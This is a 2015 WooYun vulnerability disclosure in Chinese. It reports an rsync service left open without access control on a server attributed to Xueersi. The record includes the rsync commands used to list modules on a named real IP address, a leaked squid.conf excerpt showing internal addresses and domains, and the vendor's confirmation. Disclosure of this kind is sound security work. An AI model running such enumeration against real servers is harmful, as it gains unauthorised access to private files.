乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-09: 细节已通知厂商并且等待厂商处理中 2015-03-10: 厂商已经确认,细节仅向厂商公开 2015-03-20: 细节向核心白帽子及相关领域专家公开 2015-03-30: 细节向普通白帽子公开 2015-04-09: 细节向实习白帽子公开 2015-04-23: 细节向公众公开
某rsync服务没有合适权限控制,导致文件可访问
google 搜了下此IP地址 确认下是学而思的服务器http://115.182.69.104/icsquiz/cocoslin2/
➜ rsync 115.182.69.104::xes_3d_employeewangyangtestmsiwuhanicsServerics3_icsquizics2_icsquizics3_videoSquid_soft------------------------------------------➜ rsync 115.182.69.104::Squid_softdrwxr-xr-x 4096 2014/06/17 11:21:54 .drwxr-xr-x 4096 2014/06/17 15:29:57 confdrwxr-xr-x 4096 2014/06/18 10:55:01 scriptsdrwxr-xr-x 4096 2014/06/18 10:37:30 softwaredrwxr-xr-x 4096 2014/06/18 15:54:12 system_conf
cat squid/squid.conf......acl all src 0.0.0.0/0.0.0.0acl manager proto cache_objectacl localhost src 127.0.0.1/255.255.255.255acl to_localhost dst 127.0.0.0/8acl icsinterface dst 59.151.117.145/255.255.255.255acl SSL_ports port 443 563acl Safe_ports port 80 # httpacl Safe_ports port 6080 # ics interfaceacl Safe_ports port 8080 # httpacl Safe_ports port 3128 # httpacl Safe_ports port 21 # ftpacl Safe_ports port 443 563 # https, snewsacl Safe_ports port 70 # gopheracl Safe_ports port 210 # waisacl Safe_ports port 1025-65535 # unregistered portsacl Safe_ports port 280 # http-mgmtacl Safe_ports port 488 # gss-httpacl Safe_ports port 591 # filemakeracl Safe_ports port 777 # multiling httpacl CONNECT method CONNECTacl PURGE method PURGEacl req_domain dstdomain .xueersi.com .xueersi.net .xueersi.org .eduu.com .eduu.cn .eduuu.com .mimio.com .mobby.cn .sinaimg.cn .jiajiaoban.com .aoshu.com .youjiao.com .bj.zhongkao.com .gaokao.com .yingyu.com .zuowen.com .liuxue.com .yuer.com .speiyou.com .speiyou.cn .263.net .ip138.com .100tal.com .263.com .zhiyinlou.com......
rsync限制对外访问
危害等级:高
漏洞Rank:10
确认时间:2015-03-10 10:00
谢谢 正在修复中
暂无